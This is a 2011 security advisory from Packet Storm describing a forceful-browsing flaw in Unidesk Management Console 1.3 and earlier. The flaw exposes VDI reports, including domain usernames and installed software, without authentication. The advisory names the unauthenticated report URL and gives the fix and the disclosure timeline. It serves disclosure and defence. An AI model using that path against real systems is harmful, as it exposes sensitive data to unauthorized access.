Unidesk Management Administrative Bypass

2011-03-25T00:00:00
ID PACKETSTORM:99743
Type packetstorm
Reporter Nathan Power
Modified 2011-03-25T00:00:00

Description

                                        
                                            `------------------------------------------------------------------  
1. Summary:  
  
Unidesk management appliance is prone to a forceful browsing vulnerability  
that allows an attacker access to administrator resources.  
  
------------------------------------------------------------------  
2. Description:  
  
The "ReportingService" of the web services does not check for session  
credentials to access reports about the Virtual Desktop Infrastructure  
environment.  
  
These reports provides information such as:  
  
* Applications installed  
* CachePoint appliance information  
* Desktop names  
* Domain usernames  
* Operating systems installed  
  
An attacker may gain access to the reports by directly pointing to the  
following URL:  
  
/Uni.Web/Reporting/Default.aspx  
  
------------------------------------------------------------------  
3. Impact:  
  
This issue can be exploited to access sensitive information that may lead to  
further attacks.  
  
------------------------------------------------------------------  
4. Affected Products:  
  
Unidesk Management Console version 1.3 and prior.  
  
------------------------------------------------------------------  
5. Solution: Upgrade to version 1.4  
  
------------------------------------------------------------------  
6. Time Table:  
  
3/17/2011 Reported Vulnerability to the Vendor  
3/25/2011 Vendor Acknowledge Vulnerability, fix will be addressed in the 1.4  
release  
  
------------------------------------------------------------------  
7. Credits:  
  
Discovered by Nathan Power  
www.securitypentest.com  
  
------------------------------------------------------------------  
`